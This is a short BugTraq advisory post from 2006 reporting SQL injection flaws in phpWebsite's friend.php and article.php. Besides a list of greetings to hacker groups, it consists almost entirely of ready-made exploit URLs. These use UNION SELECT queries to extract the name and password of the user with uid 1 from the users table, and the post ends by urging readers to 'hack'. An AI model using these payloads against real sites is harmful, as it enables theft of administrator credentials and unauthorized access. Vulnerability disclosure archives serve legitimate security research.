BugTraq
phpWebsite <= SQL Injection (friend.php) & (article.php) Mar 18 2006 09:03PM
dabdoub_mosikar forislam com
[+]phpWebsite
[+]DaBDouB-MoSiKaR [Moroccan Security Team]
[+]creetz to: Moroccan security Team[Dr.E-vil,Dr.Erase,H0550N],ToM-le-Magician[france] , ameer[egypt], Esp!onLeRaVaGe, CiM TeaM, xMs3D0,|ucifer,B6,al-houda members[nabil,sn!per,Kasparov]and all hackers musilm [morocco] and www.lezr.com
[+]special 10x to: safaa
[-]get name
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20na
me%20From%20users%20where%20uid=1
[+]
[-]get password:
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20pa
ss%20From%20users%20where%20uid=1
[+] second sql
[-]http://[target]/article.php?sid=[sql]
[+]have nice day and hack

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus